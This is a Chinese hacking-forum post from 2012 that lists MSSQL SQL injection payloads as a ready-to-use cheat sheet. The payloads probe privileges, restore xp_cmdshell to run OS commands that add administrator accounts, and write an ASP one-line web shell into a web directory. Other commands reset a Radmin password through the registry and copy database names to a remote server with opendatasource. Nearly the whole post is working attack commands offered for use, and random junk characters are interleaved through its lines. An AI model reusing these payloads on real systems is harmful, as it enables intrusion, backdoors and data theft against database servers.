找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2114|回复: 0
打印 上一主题 下一主题

常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:40:13 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
//看看是什么权限的8 p9 h; A) D. t
and 1=(Select IS_MEMBER('db_owner'))' P! L$ a$ a& _9 k
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
- H. a6 p8 a- A+ D6 E9 J5 t+ X. Z0 `
//检测是否有读取某数据库的权限
  N4 j* R; Q1 o, `, iand 1= (Select HAS_DBACCESS('master'))
4 \  Q; E( N/ f6 fAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
7 _, H- y( ^- P
1 `7 K1 g: _9 Q
5 |+ k$ }& O8 s+ w: |! q2 h数字类型; r! o7 X; C% e
and char(124)%2Buser%2Bchar(124)=02 X- h! {; k2 U4 R/ _
* Q) k! w$ b( \$ M
字符类型5 ?) T! L* K4 X! `* V/ D3 d
' and char(124)%2Buser%2Bchar(124)=0 and ''='
' @) Q6 D# t6 j+ d" O
7 s: B* ~$ D0 N6 O* d搜索类型; t5 `/ a! C4 d7 W
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
6 O5 U; R$ l) G5 e) i5 ~2 F
9 t. F3 [- L+ m0 d5 m4 h爆用户名
4 A7 Z; C- j. U4 nand user>0
: U0 [) E  \9 a: ~9 S' and user>0 and ''='
( H3 E4 c! K, l: w8 ~4 N$ K$ W) z1 Y" `* O7 A8 C- \
检测是否为SA权限$ r" M! H& r+ h, m
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--# @9 x# g  z9 {" r4 Z# l+ P
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
0 C# m* E& @. E' h# }
; F) R" ^' T8 D  g检测是不是MSSQL数据库
/ R3 `" H% R1 z, Xand exists (select * from sysobjects);--
) K7 ~3 I4 A+ L  X( c- l! M3 ~5 R* ?
检测是否支持多行- U0 k7 `+ R0 Y4 o+ |
;declare @d int;--
( s3 t3 U8 _6 A8 A9 _
* d5 s! {1 j# C7 V1 y1 g, G恢复 xp_cmdshell
2 X# N. E9 v! b;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
" E9 z! J6 ^; i9 I; i- A' B) A
) |% D8 j8 L8 L/ m; D' s( }, Q6 Q$ p- c. a% `' ~
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
- z& ]* C3 E8 p/ Y  g" E% L9 @0 C0 ?# ~0 Z
//-----------------------
$ n- A. l* N5 Z5 g//       执行命令( n% b/ K4 ]& R& B' w* a
//-----------------------) A4 E5 l, l+ r- Z7 H7 ?3 U7 ~
首先开启沙盘模式:3 K' t% p" D8 }& H5 p( J; a. l
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',17 L9 E9 _! e4 w7 R5 g

" l; |$ p/ H* Z8 w7 \/ p/ @然后利用jet.oledb执行系统命令
! s$ j! E& G, ^select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
' B' W) B, K1 x0 z7 [. p) }
& t5 P0 }4 ?+ s3 Z1 L, X: G" V执行命令
3 f  a2 [, G: B0 M+ G) E* _6 ?;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--1 B4 D; V* N% E& O/ k6 H+ i' K' U
+ I3 |) B5 p" G% o" b+ F
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
/ Y8 `  s# K" U
# t5 m: S2 t6 G; ^判断xp_cmdshell扩展存储过程是否存在:
  U+ o# Z" C# ]# S0 T, c8 t! dhttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')" x; g% A3 r6 z' i7 b& e' e
, ~; G. r2 E! U- r0 D6 W0 V. m; q
写注册表" H4 b' [9 }' n6 N/ x
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',16 V, x$ Y7 ~: b. Y8 Q
0 N: n) E! G& L  C8 d/ f& ]) n/ O
REG_SZ
4 H: c0 w4 K$ f5 q7 P: f3 U: s
9 l) s/ ?" E$ {9 P读注册表
& e. G5 n2 O+ l# F. s. ]exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'3 t( `+ [  t7 i( k( M# C
7 X# f7 A- j, h3 b1 G+ B# o
读取目录内容6 G" d" I1 B/ R# R; N9 I
exec master..xp_dirtree 'c:\winnt\system32\',1,1( O9 ?+ h  v' u  ^

8 t/ N/ q9 i6 ?. X4 v3 f3 b+ X0 g
, L1 E& {% D+ G数据库备份
$ M# C* I( a) z, {% l3 A4 Q) Fbackup database pubs to disk = 'c:\123.bak') k) ]/ F+ r* n% }: l# s8 r* K
+ i6 D) t" \$ ^/ W
//爆出长度
. S$ T- ^% y8 V( H: v. L; }5 sAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--  @4 ^3 `* k' ?0 l

% M$ x2 s" m2 O0 P/ Z, n4 `4 }; r
' A# p8 K5 Z: W/ y& Y  z
! Z1 f0 [% p. a. @6 }更改sa口令方法:用sql综合利用工具连接后,执行命令:1 h( I) k! K( B: M3 A1 N- _; j
exec sp_password NULL,'新密码','sa'
; O* H! [7 N8 Y. l+ q" _9 G+ E" v! ?! i
添加和删除一个SA权限的用户test:9 U, r& E/ F9 w  v' ~& L( D, g
exec master.dbo.sp_addlogin test,9530772
$ h+ M" {2 M; [0 x4 F1 Fexec master.dbo.sp_addsrvrolemember test,sysadmin+ L! U% z0 `* `6 v. c  h
# o7 w, U. ?; _+ u0 [* Z5 W, r' U
删除扩展存储过过程xp_cmdshell的语句:
: I1 o) z# z8 b- ~1 h' z* G! R5 texec sp_dropextendedproc 'xp_cmdshell'
! {, O, N( r' X4 E* |; O4 ~$ N/ O6 F2 e+ w  T
添加扩展存储过过程
5 i0 b/ M, \  E2 DEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
" ?( i( Y- }- ?2 c' G7 M. ?& x2 G- ~$ AGRANT exec On xp_proxiedadata TO public3 A2 P1 K. `# f
3 c5 {& R5 ]# k1 c

7 p! U; b! e! T. Q/ |8 r停掉或激活某个服务。# h* f7 T7 A+ h; c
' I  K3 L: Z- L8 I" C( G
exec master..xp_servicecontrol 'stop','schedule'
8 d* W# n$ h* N( ~. Jexec master..xp_servicecontrol 'start','schedule'
& b7 q6 n" E# i  E. }4 X; g0 E/ w" S; \4 ~5 X  E, K
dbo.xp_subdirs8 C- |' n+ t1 [! H! E
  Y6 _- y  L" x0 w
只列某个目录下的子目录。
# F9 C, b  A' d/ W4 {, _$ Z9 fxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp', i2 q4 M$ E% |3 x  _0 s
0 f3 l( N; t$ l: A2 ^
dbo.xp_makecab
! B& m; y' Q5 z9 c4 w- I' K, o
3 c1 Y/ H2 w" r+ L( t将目标多个档案压缩到某个目标档案之内。
1 z, F  ~- t$ I; D& f# A所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。8 z# w& J# R2 `( B

( n. q/ E% @8 @% A5 sdbo.xp_makecab
  G8 ^& |, i& ]0 J'c:\test.cab','mszip',1,
7 e) N- @9 B8 i8 V3 _$ }5 l'C:\Inetpub\wwwroot\SQLInject\login.asp',6 t* D3 ^, j) p; z
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'$ W; i# @2 H% R5 l4 U

+ n7 r7 L( }/ f* w* sxp_terminate_process
5 a/ d$ m; g& D( i" i: J; q/ P5 o. W" g' p  g$ B6 F9 |2 ~, h2 R4 m
停掉某个执行中的程序,但赋予的参数是 Process ID。2 i3 u: Z5 q+ a  f
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID! c; }4 ?! t, s% u) v. ]1 r4 @

! Y* ^4 x0 t2 dxp_terminate_process 24843 A5 \! k; S. z5 [' ], u7 I
) w: l7 P6 o8 ^: E& n$ m% x8 S! ]; N6 L
xp_unpackcab
2 U( p( T; G* M( m  R% e& g7 N& @: d  x: ?/ ?$ a* E
解开压缩档。# o& P% v# V* q, v; ~3 j; W0 n8 y7 g
; n  h/ M& b& D( K5 B0 m
xp_unpackcab 'c:\test.cab','c:\temp',18 x5 h0 d3 j* x5 F) ]
0 A0 }9 }8 P. M4 ]6 W( s
1 A; r" x0 u4 \% G$ r/ ?
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为12349 ^7 n& w0 z$ a2 `3 @  C
. r: I2 f) L" R( X
create database lcx;
$ n$ E9 E1 }9 v  J$ I9 B) rCreate TABLE ku(name nvarchar(256) null);
' ~" z( \8 I- A) XCreate TABLE biao(id int NULL,name nvarchar(256) null);
8 E0 k0 X' m+ x% e! {
, z" \( r9 G1 s7 @//得到数据库名
/ b* y5 U; P" H) ?9 s# a+ linsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases: D5 q- u) w; d" g+ a4 F: Q$ ]# h

8 }, H4 M2 o& t" g8 i" d0 Q) f6 u/ e6 ^
//在Master中创建表,看看权限怎样
' u2 s( z9 d; j" `# o  `' ]Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--' e1 v  e) x8 Q1 C

% G3 F- P. e5 b* N: v& S) A用 sp_makewebtask直接在web目录里写入一句话马:6 S3 k4 L" `* O" `9 E2 ~$ |, l" N
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
, B1 a# j' m7 n2 ?! Y7 e1 e: a* ?2 w# j1 l3 o
//更新表内容. D8 n- d) I2 b) R; ^, B, [7 g5 @
Update films SET kind = 'Dramatic' Where id = 123
& b8 T9 R8 J! \( \8 m( I8 a( p- [4 T0 `: @7 N1 m3 B
//删除内容
: i4 ~1 T1 w. b/ L* V. ~6 Q9 l$ [delete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表